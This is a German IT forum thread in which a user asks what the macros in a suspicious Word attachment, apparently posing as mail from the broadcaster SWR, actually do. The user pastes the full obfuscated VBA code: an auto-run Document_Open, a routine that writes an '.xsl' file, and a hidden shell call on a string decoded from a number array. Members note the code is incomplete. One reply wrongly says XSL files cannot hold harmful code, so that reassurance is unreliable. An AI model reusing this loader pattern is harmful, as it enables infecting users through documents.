Wertes Forum,
vorab zur Info, ich weiß nicht ob ich hier mit meiner Frage an der richtigen Stelle bin UND ich habe keinerlei Ahnung von Visual Basic und habe mich lediglich hier registriert um eine Frage stellen zu können und hoffe auf eine Antwort.

Ich habe eine Mail bekommen (vermeintlich vom SWR), an die ein Word-Dokument angehängt war. Das Scannen und Prüfen beim Abspeichern und beim abgespeicherten Dokument von meinem aktuellen Avira Antivir Pro brachte keine Warnungen.
Beim Öffnen des Dokuments bekam ich lediglich den Hinweis, ich solle die "Bearbeitung aktivieren". Habe ich natürlich nicht gemacht. Die Einstellung bei mir ist derart, dass Macros nicht ausgeführt werden.
Ich konnte allerdings die Macros, welche in dem Dokument enthalten waren, separieren. Nur kann ich damit nichts anfangen, wüsste aber gerne, was dieses Script macht.
Da sind 3 Macros enthalten:
#### Makro_1: atry7
#### Makro_2: main
#### Makro_3: Document_Open

Bei einem Bekannten ist scheinbar trotz der Deaktivierung der Macros irgendwas passiert, denn er bekam dieses Word-Dokument mit Bildern aus seiner eigenen Dropbox angezeigt.
Natürlich möchte ich das Script hier nicht abbilden, aber wenn mir jemand helfen kann und fähig ist das zu analysieren, könnte ich es anderweitig übermitteln. Für eine Hilfe wäre ich dankbar. Solange ich nicht weiß was das Script macht ist man doch eher unruhig. Der Antiovirus-Scan über das gesamte System allerdings brachte nichts zutage, alles sei in Ordnung.
Bis dahin mal vielen Dank.

*Topic aus dem VBA-Forum verschoben*
=> Nun doch wieder zurück verschoben.

Makros sind aus gutem Grund standardmäßig deaktiviert. Mit VBA-Makros (also in Word & Co.) kann man im Prinzip alles machen.

Wenn du keine Mail vom SWR erwartest, wird es wohl Schadcode sein, also am besten direkt löschen.

Wenn du aber genauer wissen willst, was das Skript macht, dann musst du uns das hier schon zeigen. VIelleicht als Screenshot, dann kann das keiner so direkt übernehmen.

Erst einmal vielen Dank für die Antwort.

Ja, ich hätte es gleich löschen können - mache ich in der Regel auch mit solchen Sachen, aber hier interessiert mich schon was das ggf. macht. Schon allein wegen meinem Bekannten der seine Bilder aus der Dropbox angezeigt bekam. Das mit dem Screenshot ist eine gute Idee. Kann ich einfach ein Bild von meinem PC hier einfügen? Finde dazu nichts.

Du musst auf erweiterte Antwort klicken und dann Dateianhang hinzufügen

Vielen Dank für den Hinweis, so habe ich es gefunden.
Vielleicht kann nun jemand sagen, was diese Scripten machen.
Wie gesagt, würde mich nur mal interessieren.
Vielen Dank schon mal...

So wie ich das sehe, wird einfach eine Datei erstellt und mit Inhalt gefüllt. Anschließend wird diese Datei ausgeführt.

Was da drin steht und wie die heißt, kann man nicht sehen, weil Dateiname und Inhalt ziemlich umständlich (mit Absicht) zusammengebaut werden.

Man könnte die eine Zeile mit run entfernen und schauen, was erzeugt wird. Wäre mir aber zu riskant.

Wie gesagt, bei dem Bekannten wurden Bilder aus dessen Dropbox im Word-Dokument angezeigt.
Aber trotzdem mal bis dahin vielen Dank. Dass es eine Schweinerei ist dachte ich mir schon, nur was für eine hätte ich gerne gewusst.

Die Datei, die angelegt wird, hat übrigens die Endung .xsl. Ich bin auch gar nicht sicher, ob mit dieser Datei dann irgendwas gemacht wird. Der Ausführen-Befehl kann auch was anderes machen. Ich wüsste auch nicht, wie eine xsl-Datei schädlich sein könnte. Was mich allerdings wundert ist der Dateiname bzw. Pfad. Da taucht \\ auf, was eigentlich unzulässig ist. Evtl. schreibt man so direkt in eine Dropbox? Davor ist ein "p", vielleicht das Ende von "drop" und eine Art von Protokoll für Dropbox.

Vielen Dank Marcus,
es scheint dann demnach jetzt nichts Großartiges zu sein was jetzt auf die Dauer Ärger macht. Der Bekannte hat jetzt auch im Nachhinein noch nichts weiter festgestellt nachdem beim ersten Öffnen der Word-Datei darin diese Dropbox-Bilder angezeigt wurden. Vielleicht ist das Ganze harmlos und nur ein übler Scherz um die Leute zu erschrecken.
Nochmals Danke und Gruß
Jochen

Das, was da ausgeführt wird, kann aber durchaus neue Dateien runterladen, die dann der echte Trojaner/Virus sind. Also eine Garantie hat man da jetzt nicht.

Vielen Dank für Eure Unterstützung bei der Sache.
Schade, dass niemand in der Lage ist hier eine Analyse zu machen, was das Script tatsächlich tut.
Aber bisher hat seitdem der Avira Antivir Pro auf allen Laufwerken nichts zu bemängeln gehabt.
Auch sind keinerlei weitere Seltsamkeiten aufgetreten.
Ich denke mal, wenn da was nachkommt, dann wird er sich schon melden.
In diesem Sinne .... beste Grüße
Jochen

Gelöschter Benutzer schrieb:

eine Analyse zu machen

Ich glaube nicht, dass es jemand ernsthaft mit dem Code auseinandergesetzt hat, denn Code-Analyse anhand eines Bildes ist mühsam und fehleranfällig. Den gesamten Code für eine Analyse abtippen? Ich glaube auch nicht, dass einer das macht.
Wenn Du willst, dass jemand den Code genauer anschaut, dann müsstest Du den Code schon als "Code" (Text) einstellen.

Danke mal für den Hinweis, aber das hatte ich angeboten und mir wurde gesagt, ich solle - weil dann ungefährlich - die Scripten als Bild abstellen.
Ich will nicht gegen Forumsregeln verstoßen, also habe ich das gemacht.
Natürlich könnte ich die Dinger auch als Text abstellen, aber danach hat bisher keiner gefragt.
Willst du sie haben? Und wenn ja, auf welchem Wege?

Gelöschter Benutzer schrieb:

Ich will nicht gegen Forumsregeln verstoßen, also habe ich das gemacht

Genau genommen hast du selbst vorgeschlagen, das Skript nicht zu posten:

Gelöschter Benutzer schrieb:

Natürlich möchte ich das Script hier nicht abbilden

Gelöschter Benutzer schrieb:

Natürlich könnte ich die Dinger auch als Text abstellen

Mach es ruhig, wenn es dir unter den Nägeln brennt. Allerdings ist noch nicht gesagt, dass jemand das Skript dann analyisiert. Es ist recht kompliziert, wenn auch nicht sehr umfangreich. Wenn man allerdings das Datei-Erstellen und das Datei-Ausführen auskommentiert und sich nur den Dateinamen und -inhalt anzeigen lässt (im Debugger), weiß man vmtl. alles, was wichtig ist.

Ja, ich habe es so geschrieben, Marcus,
aber nur weil ich irgendwo in den Regeln meine gelesen zu haben, dass man das nicht unbedingt tun sollte wegen Verbreitung von Schadsoftware.

Aber wenn Du es erlaubst, dann hier diese 3 Aufrufe von dem Script als Text:

Public Sub atrY7()
Dim aGmeS2 As Long
aGmeS2 = 23360 * 1
' Publisher bought sorry oe sacristy readers

Dim az7x5
For az7x5 = 16 To 41
Debug.Print Error(az7x5)
Next az7x5
' Part biographical montana old
Dim awHEeb
awHEeb = 3832 - 3
' Complication fry compress chromatic
Dim ag3Ou As Integer
ag3Ou = 10151 * 2
Dim aJdcfX As Integer
Dim aGp450
aJdcfX = 72
aGp450 = -108 + 155
aYUaDI = aJdcfX - aGp450
' Webb compulsion rudolph
Dim alIq6 As Long
Dim adotv
alIq6 = -1514 + 1534
adotv = 58
ag9tP = alIq6 / adotv
Dim aDWXo
aDWXo = 5413 * 2

Dim aaj91h
For aaj91h = 13 To 34
Debug.Print Error(aaj91h)
Next aaj91h
' Oxygen anteroom

Dim a84J5
For a84J5 = 7 To 52
Debug.Print Error(a84J5)
Next a84J5
' Italics yeh baying
Set auJwF = New frm
aYadt = auJwF.a.value
aC2HlL = auJwF.b.value
asmDMa = aYadt + aC2HlL
anbIX = "sl"
Open aCs9Gm + aXAuD + "p\\aErFc.x" + anbIX For Output As #1
Dim azma1p As Long
azma1p = 32070 * 1
Dim a9Xu7 As Long
a9Xu7 = 29047 * 1
' Staffs stripes inkling happen
Print #1, asmDMa
Close #1
End Sub
Sub abkZ7(aiWlL)
Dim aQbc9
aQbc9 = 24530 * 1

Dim auzW6
For auzW6 = 19 To 59
Debug.Print Error(auzW6)
Next auzW6
Dim a6E7wi As Integer
Dim aCBgI As Integer
a6E7wi = 9
aCBgI = -163 + 193
alwrP = a6E7wi * aCBgI
Dim adYI1
adYI1 = 32743 * 1
' Next loch

Dim aBulCd
For aBulCd = 6 To 58
Debug.Print Error(aBulCd)
Next aBulCd
End Sub


Sub Document_Open()
Call main
End Sub

Document_Open
Function auxHX()
auxHX = Array(7, 0, 71, 71, 71, 0, 0, 68, 68, 68, 0, 5, 73, 73, 68, 70, 5, 3, 3, 7, 73, 86, 93, 11, 70, 99, 87, 96, 68, 121, 85, 72, 64, 81, 121, 86, 82, 74, 65, 75, 76, 82, 121, 31, 70, 7, 31, 81, 68, 72, 87, 74, 67, 10, 5, 81, 86, 76, 73, 5, 86, 86, 64, 70, 74, 87, 85, 5, 70, 24, 71, 71, 71, 5, 81, 64, 86, 3, 3, 76, 72, 82, 24, 68, 68, 68, 5, 81, 64, 86, 7, 5, 70, 10, 5, 65, 72, 70)
End Function
Sub main()
Dim aFfUm As Integer
Dim aUDWQ4
aFfUm = 7 * 3
aUDWQ4 = 3002 / 79
atVifk = aFfUm + aUDWQ4
' Loom
Dim aQ9XLY As Integer
aQ9XLY = 31634 * 1
' Collation repository emit trolley

Dim aRusj
For aRusj = 21 To 43
Debug.Print Error(aRusj)
Next aRusj
' Nozzle tinkling dead silica seats chloe cones
Dim a4qcU
Dim abuh29
a4qcU = 264 - 200
abuh29 = 36
aiDFId = a4qcU * abuh29
' Tornado snarl strut imp leggings

Dim aqHUG
For aqHUG = 4 To 58
Debug.Print Error(aqHUG)
Next aqHUG
' Mirror
Call atrY7
Set al40u = New WshShell
al40u.run StrReverse(acBYor(auxHX, 611 - 574)), 0
Dim aNGF2z
Dim aK3Tsj As Integer
aNGF2z = -9 + 126
aK3Tsj = -26 + 77
aRyZU = aNGF2z - aK3Tsj
' Delineate blocked

End Sub

Bis dahin mal danke.
Jochen

Bitte setze den Code noch in Code-Tags: [Forum] Welche BBCodes (Tags) gibt es hier im Forum zum Einfärben von Quellcodes (Syntax-Highlighting)?

In meinen Augen kann das Skript gar nicht so laufen, es sei denn, es gab noch mehr in dem Word-Dokument. Da wäre z. B. acBYor, was nicht definiert ist. Das müsste eine Funktion oder ein Array sein. Und Set auJwF = New frm ruft irgendein Objekt mit dem Namen "frm" ab, was es im Code nicht gibt. Evtl. ein Formular, also eine UserForm?

EDIT: Ich habe den Thread nun übrigens vom OT-Bereich doch wieder zurück nach VBA gepackt. Ist ja im Prinzip schon eine Programmierfrage.

Lieber Marcus,

damit bin ich überfordert, habe keine Ahnung davon wie man das macht, oder was hier zu tun ist.
Ich denke, ich lasse es mal gut sein. Im Dokument waren keine weiteren Macros und ich gehe davon aus, dass es gegen die Wand gelaufen ist und dabei nichts angestellt hat.
Lässt sich ja auch nirgends etwas finden.

Nochmals Danke für die Mühe.
Gruß Jochen

Offensichtlich hat sich hier jemand große Mühe gemacht die Funktionalität des Skript zu verbergen. Wieso nur? Wieso?

Hallo!

So wie es aussieht hat da jemand den Code verschlüsselt (Stichwort: CrunchCode). Nicht sehr vetrauenswürdig.

Marcus Gräfe schrieb:

Wenn du keine Mail vom SWR erwartest, wird es wohl Schadcode sein, also am besten direkt löschen.

Der SWR versendet m.W. keine Dateien, schon garnicht mit Anhang und VBA-Code. Ich würde den SWR darüber informieren, damit er seinerseits eine offizielle "Presse"-Meldung abgeben kann (auf der SWR-Homepage z.B.). Man sollte generell keine unangeforderten Dateien öffnen.

Marcus Gräfe schrieb:

Die Datei, die angelegt wird, hat übrigens die Endung .xsl. Ich bin auch gar nicht sicher, ob mit dieser Datei dann irgendwas gemacht wird.

Eigentlich ist xsl (extensible stylesheet languange) ein Stylesheet, welches nur das Aussehen (Layout) einer XML-Datei vorgibt. Einen Schadcode kann xsl eigentlich nicht enthalten.